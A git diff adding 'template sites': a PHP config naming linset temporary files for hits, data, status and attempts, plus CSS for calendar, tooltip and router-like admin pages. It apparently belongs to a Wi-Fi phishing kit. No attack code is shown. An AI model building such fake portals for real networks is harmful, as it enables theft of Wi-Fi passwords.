Add template sites
|
@ -0,0 +1,10 @@
|
|||
<?php
|
||||
// Configurare questo file indicando i percorsi della cartella temporanea di linset
|
||||
|
||||
$TMP_PATH = "/tmp/TMPlinset/";
|
||||
|
||||
define("HIT", "$TMP_PATH"."hit.txt");
|
||||
define("DATA", "$TMP_PATH"."data.txt");
|
||||
define("STATUS", "$TMP_PATH"."status.txt");
|
||||
define("INTENTO", "$TMP_PATH"."intento");
|
||||
?>
|
|
@ -0,0 +1,95 @@
|
|||
/* calendar icon */
|
||||
img.tcalIcon {
|
||||
cursor: pointer;
|
||||
margin-left: 1px;
|
||||
vertical-align: middle;
|
||||
}
|
||||
/* calendar container element */
|
||||
div#tcal {
|
||||
position: absolute;
|
||||
visibility: hidden;
|
||||
z-index: 100;
|
||||
width: 158px;
|
||||
padding: 2px 0 0 0;
|
||||
}
|
||||
/* all tables in calendar */
|
||||
div#tcal table {
|
||||
width: 100%;
|
||||
border: 1px solid silver;
|
||||
border-collapse: collapse;
|
||||
background-color: white;
|
||||
}
|
||||
/* navigation table */
|
||||
div#tcal table.ctrl {
|
||||
border-bottom: 0;
|
||||
}
|
||||
/* navigation buttons */
|
||||
div#tcal table.ctrl td {
|
||||
width: 15px;
|
||||
height: 20px;
|
||||
}
|
||||
/* month year header */
|
||||
div#tcal table.ctrl th {
|
||||
background-color: white;
|
||||
color: black;
|
||||
border: 0;
|
||||
}
|
||||
/* week days header */
|
||||
div#tcal th {
|
||||
border: 1px solid silver;
|
||||
border-collapse: collapse;
|
||||
text-align: center;
|
||||
padding: 3px 0;
|
||||
font-family: tahoma, verdana, arial;
|
||||
font-size: 10px;
|
||||
background-color: gray;
|
||||
color: white;
|
||||
}
|
||||
/* date cells */
|
||||
div#tcal td {
|
||||
border: 0;
|
||||
border-collapse: collapse;
|
||||
text-align: center;
|
||||
padding: 2px 0;
|
||||
font-family: tahoma, verdana, arial;
|
||||
font-size: 11px;
|
||||
width: 22px;
|
||||
cursor: pointer;
|
||||
}
|
||||
/* date highlight
|
||||
in case of conflicting settings order here determines the priority from least to most important */
|
||||
div#tcal td.othermonth {
|
||||
color: silver;
|
||||
}
|
||||
div#tcal td.weekend {
|
||||
background-color: #ACD6F5;
|
||||
}
|
||||
div#tcal td.today {
|
||||
border: 1px solid red;
|
||||
}
|
||||
div#tcal td.selected {
|
||||
background-color: #FFB3BE;
|
||||
}
|
||||
/* iframe element used to suppress windowed controls in IE5/6 */
|
||||
iframe#tcalIF {
|
||||
position: absolute;
|
||||
visibility: hidden;
|
||||
z-index: 98;
|
||||
border: 0;
|
||||
}
|
||||
/* transparent shadow */
|
||||
div#tcalShade {
|
||||
position: absolute;
|
||||
visibility: hidden;
|
||||
z-index: 99;
|
||||
}
|
||||
div#tcalShade table {
|
||||
border: 0;
|
||||
border-collapse: collapse;
|
||||
width: 100%;
|
||||
}
|
||||
div#tcalShade table td {
|
||||
border: 0;
|
||||
border-collapse: collapse;
|
||||
padding: 0;
|
||||
}
|
|
@ -0,0 +1,619 @@
|
|||
@CHARSET "UTF-8";
|
||||
|
||||
body {
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
div {
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
div.error {
|
||||
margin-left: auto;
|
||||
margin-right: auto;
|
||||
margin-top: auto;
|
||||
padding: 4px;
|
||||
z-index: 99;
|
||||
width: 350px;
|
||||
}
|
||||
|
||||
div.textbox {
|
||||
clear: left;
|
||||
margin: 0 0 0.5em 0;
|
||||
}
|
||||
|
||||
.textbox label {
|
||||
float: left;
|
||||
width: 25%;
|
||||
padding-top: 3px;
|
||||
text-align: right;
|
||||
}
|
||||
|
||||
.textbox input,.textbox select {
|
||||
width: 60%;
|
||||
margin-left: 20px;
|
||||
}
|
||||
|
||||
.text .checkbox input {
|
||||
margin-left: 22%;
|
||||
padding: 0;
|
||||
}
|
||||
|
||||
.text .button {
|
||||
width: 98%;
|
||||
}
|
||||
|
||||
.text .button input {
|
||||
margin-right: 2px; /* Textbox borders */
|
||||
}
|
||||
|
||||
ol,ul {
|
||||
list-style: none;
|
||||
}
|
||||
|
||||
/*
|
||||
* Header
|
||||
*/
|
||||
div#header {
|
||||
width: 100%;
|
||||
height: 60px;
|
||||
}
|
||||
|
||||
div#header img#logo {
|
||||
float: left;
|
||||
}
|
||||
|
||||
div#header span.title {
|
||||
float: left;
|
||||
font-size: 30pt;
|
||||
font-weight: bolder;
|
||||
color: #C6003D;
|
||||
margin-left: 20px;
|
||||
margin-top: 15px;
|
||||
font-family: "Courier New", helvetica, sans-serif;
|
||||
text-shadow: 3px 3px 6px pink, 20px -20px 3px white, 8px -10px 7px black;
|
||||
vertical-align: super;
|
||||
}
|
||||
|
||||
ul.headerButtons {
|
||||
margin-top: 0px;
|
||||
float: right;
|
||||
}
|
||||
|
||||
ul.headerButtons li {
|
||||
float: right; display : block;
|
||||
margin-right: 10px;
|
||||
display: block;
|
||||
}
|
||||
|
||||
/*
|
||||
* Content
|
||||
*/
|
||||
div#content {
|
||||
clear: both;
|
||||
padding: 0px;
|
||||
margin-top: 10px;
|
||||
margin-left: 10px;
|
||||
margin-right: 10px;
|
||||
overflow: auto;
|
||||
}
|
||||
|
||||
/*
|
||||
* Footer
|
||||
*/
|
||||
div#footer {
|
||||
margin-left: 10px;
|
||||
margin-right: 10px;
|
||||
margin-top: 20px;
|
||||
margin-bottom: 0px;
|
||||
clear: both;
|
||||
font-size: 9px;
|
||||
}
|
||||
|
||||
/*
|
||||
* link icons
|
||||
*/
|
||||
ul.icons li {
|
||||
float: left;
|
||||
display: block;
|
||||
margin-right: 10px;
|
||||
margin-left: 10px;
|
||||
}
|
||||
|
||||
a.icon {
|
||||
display: block;
|
||||
padding-top: 50px;
|
||||
width: 120px;
|
||||
height: 60px;
|
||||
font-size: 12px;
|
||||
text-align: center;
|
||||
background-position: center top;
|
||||
background-repeat: no-repeat;
|
||||
}
|
||||
|
||||
/*
|
||||
* Preview panel and link icons
|
||||
*/
|
||||
div.previewPanel {
|
||||
display: none;
|
||||
padding: 2px 2px 2px 8px;
|
||||
min-width: 200px;
|
||||
}
|
||||
|
||||
div.previewPanel ul.icons {
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
div.previewPanel ul.icons li {
|
||||
float: left;
|
||||
display: block;
|
||||
margin-right: 3px;
|
||||
margin-left: 0px;
|
||||
padding: 0px 0px 0px 3px;
|
||||
}
|
||||
|
||||
div.previewPanel a.icon {
|
||||
display: block;
|
||||
padding-top: 5px;
|
||||
padding-bottom: 0px;
|
||||
padding-left: 50px;
|
||||
font-size: 10px;
|
||||
width: 120px;
|
||||
text-align: left;
|
||||
background-position: left top;
|
||||
background-repeat: no-repeat;
|
||||
}
|
||||
|
||||
/*
|
||||
* panels
|
||||
*/
|
||||
div.panel {
|
||||
padding: 3px;
|
||||
}
|
||||
|
||||
label.panel {
|
||||
margin-left: 5px;
|
||||
margin-bottom: 3px;
|
||||
float: left;
|
||||
}
|
||||
|
||||
img.panel {
|
||||
float: right;
|
||||
margin-right: 3px;
|
||||
margin-bottom: 3px;
|
||||
}
|
||||
|
||||
hr.panel {
|
||||
clear: both;
|
||||
}
|
||||
|
||||
/*
|
||||
* tabs
|
||||
*/
|
||||
ul.tabs {
|
||||
display: block;
|
||||
padding: 0;
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
div.form ul.tabs {
|
||||
float: left;
|
||||
margin-bottom: 10px;
|
||||
}
|
||||
|
||||
ul.tabs li {
|
||||
float: left;
|
||||
display: block;
|
||||
}
|
||||
|
||||
div.form ul.tabs li {
|
||||
margin-left: 10px;
|
||||
}
|
||||
|
||||
a.tab {
|
||||
display: block;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
div.form a.tab {
|
||||
padding-top: 6px;
|
||||
height: 36px;
|
||||
width: 160px;
|
||||
}
|
||||
|
||||
div#header ul.tabs {
|
||||
float: right;
|
||||
margin-top: 10px;
|
||||
}
|
||||
|
||||
div#header ul.tabs li {
|
||||
margin-right: 10px;
|
||||
}
|
||||
|
||||
div#header a.tab {
|
||||
padding-top: 2px;
|
||||
padding-bottom: 2px;
|
||||
height: 32px;
|
||||
width: 130px;
|
||||
}
|
||||
|
||||
/*
|
||||
* form panels
|
||||
*/
|
||||
div.formGraphics {
|
||||
margin-top: 10px;
|
||||
margin-left: 5px;
|
||||
float: left;
|
||||
min-height: 350px;
|
||||
padding-top: 10px;
|
||||
padding-left: 5px;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
div.form {
|
||||
margin-right: 5px;
|
||||
margin-bottom: 0px;
|
||||
margin-top: 15px;
|
||||
min-height: 370px;
|
||||
overflow-x: auto;
|
||||
}
|
||||
|
||||
div.form fieldset.form {
|
||||
min-height: 180px;
|
||||
}
|
||||
|
||||
div.scroll {
|
||||
width: 100%;
|
||||
overflow: auto;
|
||||
}
|
||||
|
||||
/*
|
||||
* form fields
|
||||
*/
|
||||
fieldset.form {
|
||||
clear: both;
|
||||
margin-top: 3px;
|
||||
padding: 20px;
|
||||
margin-top: 15px;
|
||||
}
|
||||
|
||||
div.formField {
|
||||
clear: left;
|
||||
padding: 6px;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
div.formField label {
|
||||
float: left;
|
||||
text-align: right;
|
||||
width: 30%;
|
||||
margin-right: 20px;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
div.formField a {
|
||||
float: left;
|
||||
}
|
||||
|
||||
div.formField span.texthelp {
|
||||
margin-left: 20px;
|
||||
}
|
||||
|
||||
table.formTable {
|
||||
margin-top: 15px;
|
||||
margin-bottom: 10px;
|
||||
}
|
||||
|
||||
thead.formHeader {
|
||||
height: 26px;
|
||||
}
|
||||
|
||||
tr.formRow a {
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
/*
|
||||
* TODO move this to perms .css !
|
||||
*/
|
||||
tr.formRowSect {
|
||||
background-color: #DDDDCC;
|
||||
color: #006611;
|
||||
font-weight: bold;
|
||||
}
|
||||
/*
|
||||
* TODO move this to perms .css !
|
||||
*/
|
||||
tr.formRowSect td {
|
||||
border: 1px outset #EEEEFF;
|
||||
}
|
||||
|
||||
tr.formRow table td {
|
||||
border: 0px;
|
||||
}
|
||||
|
||||
/*
|
||||
* information fields
|
||||
*/
|
||||
div.infoField {
|
||||
clear: left;
|
||||
margin: 3px;
|
||||
}
|
||||
|
||||
div.infoField label {
|
||||
float: left;
|
||||
}
|
||||
|
||||
div.infoField .text {
|
||||
float: right;
|
||||
font-weight: bold;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
div.infoField .texterror {
|
||||
float: right;
|
||||
font-weight: bold;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
div.infoField div.text {
|
||||
padding: 3px;
|
||||
}
|
||||
|
||||
/*
|
||||
* titled separators
|
||||
*/
|
||||
div.titlesep {
|
||||
clear: both;
|
||||
margin-bottom: 10px;
|
||||
margin-top: 15px;
|
||||
}
|
||||
|
||||
div.titlesep label {
|
||||
float: left;
|
||||
}
|
||||
|
||||
div.titlesep hr {
|
||||
margin-left: 5px;
|
||||
margin-top: 8px;
|
||||
}
|
||||
|
||||
div.togglesep {
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
div.togglesep label {
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
/*
|
||||
* info, result, warning, error boxes
|
||||
*/
|
||||
div.infoBox {
|
||||
clear: both;
|
||||
}
|
||||
|
||||
div.msgBox {
|
||||
overflow: visible;
|
||||
display: block;
|
||||
margin: 10px;
|
||||
|
||||
font-weight: bold;
|
||||
padding-top: 12px;
|
||||
padding-bottom: 15px;
|
||||
padding-right: 5px;
|
||||
padding-left: 40px;
|
||||
z-index: 9999;
|
||||
|
||||
border-radius: 3px;
|
||||
-moz-border-radius: 3px;
|
||||
-webkit-border-radius: 3px;
|
||||
|
||||
box-shadow: 3px 3px 3px #444444;
|
||||
-moz-box-shadow: 3px 3px 3px #444444;
|
||||
-webkit-box-shadow: 3px 3px 3px #444444;
|
||||
}
|
||||
|
||||
div.phaseImage {
|
||||
float: left;
|
||||
padding: 10px;
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
div.phaseDescription {
|
||||
margin: 15px;
|
||||
}
|
||||
|
||||
div.msgBox a.closeLink {
|
||||
float: right;
|
||||
top: 0px;
|
||||
right: 5px;
|
||||
margin: 1px;
|
||||
}
|
||||
|
||||
div.msgBox a.closeLink:hover {
|
||||
border: 1px outset #FFFFAA;
|
||||
margin: 0px;
|
||||
}
|
||||
|
||||
/*
|
||||
* Navigation bar
|
||||
*/
|
||||
div#navigationBar {
|
||||
clear: both;
|
||||
margin-top: 10px;
|
||||
margin-left: 10px;
|
||||
margin-right: 10px;
|
||||
height: 28px;
|
||||
}
|
||||
|
||||
div#navigationBar ul {
|
||||
float: left;
|
||||
display: block;
|
||||
margin-top: 5px;
|
||||
margin-right: 6px;
|
||||
padding-top: 0px;
|
||||
padding-left: 5px;
|
||||
margin-left: 0px;
|
||||
}
|
||||
|
||||
div#navigationBar li {
|
||||
display: inline;
|
||||
color: white;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
div#navigationBar a {
|
||||
color: white;
|
||||
font-weight: bold;
|
||||
font-size: 11pt;
|
||||
outline: 0px;
|
||||
}
|
||||
|
||||
div#userguide {
|
||||
float: left;
|
||||
margin-left: 500px;
|
||||
display: block;
|
||||
margin-top: 5px;
|
||||
}
|
||||
|
||||
div#navigationBar div#logout {
|
||||
color: white;
|
||||
float: right;
|
||||
margin-top: 5px;
|
||||
margin-right: 5px;
|
||||
display: block;
|
||||
}
|
||||
|
||||
div#navigationBar div.reboot {
|
||||
color: white;
|
||||
float: right;
|
||||
margin-top: 5px;
|
||||
margin-right: 30px;
|
||||
display: block;
|
||||
}
|
||||
|
||||
/*
|
||||
* under construction pages
|
||||
*/
|
||||
div#underConstruction {
|
||||
border: 1px solid #AAAA00;
|
||||
background-color: #EFEF99;
|
||||
background-image: url("../images/UnderConstruction48.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 10px 10px;
|
||||
padding-left: 70px;
|
||||
padding-top: 25px;
|
||||
padding-bottom: 25px;
|
||||
font-size: 16px;
|
||||
color: #911;
|
||||
}
|
||||
|
||||
/*
|
||||
* Panel buttons and links
|
||||
*/
|
||||
div.buttons {
|
||||
float: right;
|
||||
margin-top: 10px;
|
||||
margin-bottom: 5px;
|
||||
}
|
||||
|
||||
div.buttons input {
|
||||
margin-left: 10px;
|
||||
padding: 3px;
|
||||
height: 32px;
|
||||
}
|
||||
|
||||
ul.links {
|
||||
float: left;
|
||||
margin-top: 10px;
|
||||
padding-left: 0px;
|
||||
margin-left: 0px;
|
||||
}
|
||||
|
||||
ul.links li {
|
||||
float: left;
|
||||
display: block;
|
||||
margin-right: 15px;
|
||||
margin-left: 0px;
|
||||
}
|
||||
|
||||
ul.links a:hover {
|
||||
font-weight: normal;
|
||||
}
|
||||
|
||||
/*
|
||||
* Search bar
|
||||
*/
|
||||
div.searchInput {
|
||||
float: left;
|
||||
margin-top: 10px;
|
||||
margin-bottom: 5px;
|
||||
padding-left: 10px;
|
||||
}
|
||||
|
||||
/*
|
||||
* Status Box
|
||||
*/
|
||||
|
||||
div.boxStatusError {
|
||||
background: rgba(256, 18, 18, 0.4);
|
||||
border: 2px solid #FF1212;
|
||||
}
|
||||
|
||||
div.boxStatusNotUp {
|
||||
background: rgba(204, 204, 204, 0.8);
|
||||
border: 2px solid #BBBBBB;
|
||||
}
|
||||
|
||||
div.boxStatusUp {
|
||||
background: rgba(85, 238, 85, 0.4);
|
||||
border: 2px solid #55EE55;
|
||||
}
|
||||
|
||||
div.boxDisabled {
|
||||
opacity: 0.6;
|
||||
filter: alpha(opacity=60);
|
||||
}
|
||||
|
||||
div.boxStatus {
|
||||
float: left;
|
||||
|
||||
padding-top: 5px;
|
||||
margin-bottom: 5px;
|
||||
margin-right: 10px;
|
||||
|
||||
border-radius: 6px;
|
||||
-moz-border-radius: 6px;
|
||||
-webkit-border-radius: 6px;
|
||||
|
||||
box-shadow: 2px 2px 2px #444444;
|
||||
-moz-box-shadow: 2px 2px 2px #444444;
|
||||
-webkit-box-shadow: 2px 2px 2px #444444;
|
||||
}
|
||||
|
||||
div.previewPanel div.boxStatus a.icon {
|
||||
width:90px;
|
||||
height:50px;
|
||||
}
|
||||
|
||||
div.progressbar {
|
||||
width: 96%;
|
||||
height: 20px;
|
||||
padding-right: 2px;
|
||||
|
||||
border-radius: 2px;
|
||||
-moz-border-radius: 2px;
|
||||
-webkit-border-radius: 2px;
|
||||
}
|
||||
|
||||
div.progressbar div.progress {
|
||||
width: 0%;
|
||||
height: 18px;
|
||||
|
||||
border-radius: 2px;
|
||||
-moz-border-radius: 2px;
|
||||
-webkit-border-radius: 2px;
|
||||
}
|
|
@ -0,0 +1,91 @@
|
|||
/* simple css-based tooltip */
|
||||
.help_page_tooltip {
|
||||
background-color:#000;
|
||||
border:1px solid #fff;
|
||||
padding:10px 15px;
|
||||
width:200px;
|
||||
display:none;
|
||||
color:#fff;
|
||||
text-align:left;
|
||||
font-size:12px;
|
||||
z-index:10001;
|
||||
|
||||
/* styling */
|
||||
color: #000000;
|
||||
background-color: #FFFFCC;
|
||||
border: 1px solid white;
|
||||
|
||||
box-shadow: 7px 7px 6px #444444;
|
||||
-moz-box-shadow: 7px 7px 6px #444444;
|
||||
-webkit-box-shadow: 7px 7px 6px #444444;
|
||||
|
||||
border-radius: 6px;
|
||||
-moz-border-radius: 6px;
|
||||
-webkit-border-radius: 6px;
|
||||
|
||||
background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#FFFFCC), to(#FFFF66));
|
||||
background: -webkit-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -moz-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -ms-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -o-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
|
||||
filter: alpha(opacity=90);
|
||||
}
|
||||
|
||||
/* the overlayed element */
|
||||
|
||||
.help_page_overlay {
|
||||
|
||||
/* must be initially hidden */
|
||||
display:none;
|
||||
|
||||
padding: 2px 2px 2px 8px;
|
||||
|
||||
/* place overlay on top of other elements */
|
||||
z-index:10000;
|
||||
|
||||
right:30px;
|
||||
|
||||
/* styling */
|
||||
color: #000000;
|
||||
background-color: #FFFFCC;
|
||||
border: 2px solid white;
|
||||
|
||||
box-shadow: 7px 7px 6px #444444;
|
||||
-moz-box-shadow: 7px 7px 6px #444444;
|
||||
-webkit-box-shadow: 7px 7px 6px #444444;
|
||||
|
||||
border-radius: 6px;
|
||||
-moz-border-radius: 6px;
|
||||
-webkit-border-radius: 6px;
|
||||
|
||||
background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#FFFFCC), to(#FFFF66));
|
||||
background: -webkit-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -moz-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -ms-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
background: -o-linear-gradient(top, #FFFFCC, #FFFF66);
|
||||
|
||||
filter: alpha(opacity=90);
|
||||
|
||||
}
|
||||
|
||||
div.contentWrap {
|
||||
height:251px;
|
||||
border:0px solid #333;
|
||||
overflow-y:auto;
|
||||
}
|
||||
|
||||
/* header of help page */
|
||||
label.helpPanel {
|
||||
font-weight: bold;
|
||||
color: #222222;
|
||||
margin-right: 5px;
|
||||
margin-bottom: 3px;
|
||||
float: right;
|
||||
}
|
||||
|
||||
img.helpPanel {
|
||||
margin-left: 3px;
|
||||
margin-bottom: 3px;
|
||||
float: left;
|
||||
}
|
|
@ -0,0 +1,33 @@
|
|||
span.error {
|
||||
color: #CC0000;
|
||||
font-size: 10px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
progress {
|
||||
display: none;
|
||||
width: 25em;
|
||||
}
|
||||
|
||||
progress.update {
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
.bold {
|
||||
font-weight: bold !important;
|
||||
}
|
||||
|
||||
.red {
|
||||
color: #CC0000 !important;
|
||||
}
|
||||
|
||||
|
||||
fieldset .bold {
|
||||
display: block;/* force to a block so width and word wrap work */
|
||||
float: left;/* keep to left of following control */
|
||||
width: 183px;
|
||||
margin: 1px 8px 4px 0;
|
||||
padding: 0;
|
||||
border: 0;
|
||||
text-align: right;
|
||||
}
|
|
@ -0,0 +1,464 @@
|
|||
@CHARSET "UTF-8";
|
||||
|
||||
body, label, input, select, textarea {
|
||||
font-size: 12px;
|
||||
font-family: Verdana, sans-serif, Arial;
|
||||
}
|
||||
|
||||
body {
|
||||
background-color: #F8F8F8;
|
||||
}
|
||||
|
||||
p.error {
|
||||
padding: 4px;
|
||||
font-weight: bold;
|
||||
font-style: italic;
|
||||
color: red;
|
||||
background-color: yellow;
|
||||
border: 1px outset red;
|
||||
}
|
||||
|
||||
div.error {
|
||||
font-weight: bold;
|
||||
font-style: italic;
|
||||
border: 1px outset red;
|
||||
color: red;
|
||||
background-color: yellow;
|
||||
}
|
||||
|
||||
.textbox label {
|
||||
color: black;
|
||||
}
|
||||
|
||||
.texterror, .texterror a {
|
||||
font-weight: bold;
|
||||
color: #990000;
|
||||
}
|
||||
|
||||
.textwarning,.textwarning a {
|
||||
font-weight: bold;
|
||||
color: #bb8800
|
||||
}
|
||||
|
||||
.texttitle {
|
||||
font-weight: bold;
|
||||
color: #000077;
|
||||
}
|
||||
|
||||
.texthelp {
|
||||
font-weight: normal;
|
||||
font-style: italic;
|
||||
color: #000077;
|
||||
}
|
||||
|
||||
.enabledLink {
|
||||
font-weight: bold;
|
||||
font-style: normal;
|
||||
}
|
||||
|
||||
.disabledLink {
|
||||
font-weight: normal;
|
||||
font-style: italic;
|
||||
}
|
||||
|
||||
.titletext {
|
||||
font-weight: bold;
|
||||
color: #007700;
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 16px;
|
||||
}
|
||||
|
||||
img {
|
||||
border-width: 0px;
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
input, textarea {
|
||||
font-weight: bold;
|
||||
color: #007700;
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
select {
|
||||
font-weight: bold;
|
||||
color: #006600;
|
||||
min-height: 20px;
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
select option {
|
||||
font-weight: bold;
|
||||
color: #008800;
|
||||
line-height: 22px;
|
||||
min-height: 20px;
|
||||
vertical-align: middle;
|
||||
}
|
||||
|
||||
select option.disabled {
|
||||
font-weight: normal;
|
||||
font-style: italic;
|
||||
color: #338833;
|
||||
}
|
||||
|
||||
select.invalid {
|
||||
color: #AA0000;
|
||||
}
|
||||
|
||||
select optgroup {
|
||||
font-weight: bold;
|
||||
font-style: italic;
|
||||
min-height: 20px;
|
||||
line-height: 22px;
|
||||
vertical-align: middle;
|
||||
color: black;
|
||||
padding-top: 6px;
|
||||
padding-bottom: 4px;
|
||||
}
|
||||
|
||||
input.invalid {
|
||||
color: #AA0000;
|
||||
|
||||
/* background-image: url(../img/Warning16.png);
|
||||
background-repeat: no-repeat;
|
||||
background-position: right;
|
||||
padding-right: 16px;
|
||||
background-color: #FFDDDD;
|
||||
border-bottom: 1px solid red;
|
||||
*/
|
||||
}
|
||||
|
||||
input.warning {
|
||||
color: #FFA90C;
|
||||
}
|
||||
|
||||
textarea.invalid {
|
||||
color: #AA0000;
|
||||
}
|
||||
|
||||
input.read-only {
|
||||
background-color: #CCCCCC;
|
||||
border: 1px solid gray;
|
||||
padding: 2px;
|
||||
}
|
||||
|
||||
input:disabled {
|
||||
color: #AAAAAA;
|
||||
}
|
||||
|
||||
p.error {
|
||||
padding: 4px;
|
||||
font-weight: bold;
|
||||
font-style: italic;
|
||||
color: red;
|
||||
background-color: yellow;
|
||||
border: 1px outset red;
|
||||
}
|
||||
|
||||
a.tab {
|
||||
color: #EEEEEE;
|
||||
font-weight: bold;
|
||||
background-color: #999999;
|
||||
border: 1px solid;
|
||||
border-color: #999999;
|
||||
|
||||
box-shadow: 4px 4px 3px #444444;
|
||||
-moz-box-shadow: 4px 4px 3px #444444;
|
||||
-webkit-box-shadow: 4px 4px 3px #444444;
|
||||
|
||||
border-radius: 8px;
|
||||
-moz-border-radius: 8px;
|
||||
-webkit-border-radius: 8px;
|
||||
}
|
||||
|
||||
a.tabselected {
|
||||
color: white;
|
||||
background-color: #CB0019;
|
||||
border-color: #CB0019;
|
||||
|
||||
box-shadow: 6px 6px 4px #444444;
|
||||
-moz-box-shadow: 6px 6px 4px #444444;
|
||||
-webkit-box-shadow: 6px 6px 4px #444444;
|
||||
}
|
||||
|
||||
a.tab:hover {
|
||||
color: white;
|
||||
border-color: white;
|
||||
|
||||
box-shadow: 6px 6px 4px #444444;
|
||||
-moz-box-shadow: 6px 6px 4px #444444;
|
||||
-webkit-box-shadow: 6px 6px 4px #444444;
|
||||
}
|
||||
|
||||
div#header {
|
||||
background-color: #EEEEEE;
|
||||
border-top: 4px solid #DC012A;
|
||||
border-bottom: 3px solid #DDDDDD;
|
||||
}
|
||||
|
||||
div#header img#logo {
|
||||
margin-left: 10px;
|
||||
margin-top: 3px;
|
||||
}
|
||||
|
||||
div.formGraphics {
|
||||
width: 80px;
|
||||
|
||||
background-color: #CB0019;
|
||||
|
||||
box-shadow: 5px 5px 4px #444444;
|
||||
-moz-box-shadow: 5px 5px 4px #444444;
|
||||
-webkit-box-shadow: 5px 5px 4px #444444;
|
||||
|
||||
border-radius: 10px;
|
||||
-moz-border-radius: 10px;
|
||||
-webkit-border-radius: 10px;
|
||||
|
||||
background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#CB0019), to(#FFCCCC));
|
||||
background: -webkit-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -moz-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -ms-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -o-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
}
|
||||
|
||||
div.form {
|
||||
margin-left: 105px;
|
||||
}
|
||||
|
||||
div.panel {
|
||||
background-color: #DDDDDD;
|
||||
border: 2px groove #DDDDDD;
|
||||
}
|
||||
|
||||
fieldset.form {
|
||||
background-color: #CCCCFF;
|
||||
border: 2px groove #6666FF;
|
||||
}
|
||||
|
||||
.text, .text a {
|
||||
font-weight: bold;
|
||||
color: #007700;
|
||||
}
|
||||
|
||||
thead.formHeader {
|
||||
color: #444444;
|
||||
background-color: #FFFFCC;
|
||||
}
|
||||
|
||||
thead.formHeader th {
|
||||
border: 1px outset #FFFFAA;
|
||||
font-weight: normal;
|
||||
}
|
||||
|
||||
tr.formRow {
|
||||
background-color: #DDDDFF;
|
||||
color: #006600;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
tr.formRow a {
|
||||
color: #006600;
|
||||
}
|
||||
|
||||
tr.disabledRow {
|
||||
color: #559955;
|
||||
font-weight: normal;
|
||||
font-style: italic;
|
||||
}
|
||||
|
||||
tr.disabledRow td>img {
|
||||
filter: alpha(opacity=50);
|
||||
opacity: 0.5;
|
||||
}
|
||||
|
||||
tr.errorRow {
|
||||
background-color: #FFDDDD;
|
||||
color: #990000;
|
||||
}
|
||||
|
||||
tr.formRow td {
|
||||
border: 1px outset #EEEEFF;
|
||||
}
|
||||
|
||||
tr.mainRow {
|
||||
background-color: #EFEFFF;
|
||||
}
|
||||
|
||||
div#navigationBar {
|
||||
background-color: #CB0019;
|
||||
border: 2px groove #FFAAAA;
|
||||
font-size: 11pt;
|
||||
}
|
||||
|
||||
a {
|
||||
text-decoration: none;
|
||||
border-width: 0px;
|
||||
vertical-align: top;
|
||||
color: black;
|
||||
font-size: 9pt;
|
||||
font-family: Verdana, sans-serif, Arial;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
a.icon {
|
||||
color: black;
|
||||
}
|
||||
|
||||
a.icon:hover {
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
div.previewPanel {
|
||||
color: #FFFFFF;
|
||||
background-color: #AAAAAA;
|
||||
border: 2px solid white;
|
||||
|
||||
box-shadow: 7px 7px 6px #444444;
|
||||
-moz-box-shadow: 7px 7px 6px #444444;
|
||||
-webkit-box-shadow: 7px 7px 6px #444444;
|
||||
|
||||
border-radius: 6px;
|
||||
-moz-border-radius: 6px;
|
||||
-webkit-border-radius: 6px;
|
||||
|
||||
background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#CCCCCC), to(#888888));
|
||||
background: -webkit-linear-gradient(top, #CCCCCC, #888888);
|
||||
background: -moz-linear-gradient(top, #CCCCCC, #888888);
|
||||
background: -ms-linear-gradient(top, #CCCCCC, #888888);
|
||||
background: -o-linear-gradient(top, #CCCCCC, #888888);
|
||||
|
||||
filter: alpha(opacity=90);
|
||||
}
|
||||
|
||||
div.previewPanel a.icon {
|
||||
color: black;
|
||||
}
|
||||
|
||||
label.panel {
|
||||
font-weight: bold;
|
||||
color: #222222;
|
||||
}
|
||||
|
||||
div.formField label {
|
||||
color: black;
|
||||
}
|
||||
|
||||
div.infoField label {
|
||||
color: black;
|
||||
}
|
||||
|
||||
div.titlesep label {
|
||||
font-weight: bold;
|
||||
color: #000099;
|
||||
}
|
||||
|
||||
div.infoBox {
|
||||
background-image: url("../img/Information32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
font-style: italic;
|
||||
color: #000077;
|
||||
padding-top: 0px;
|
||||
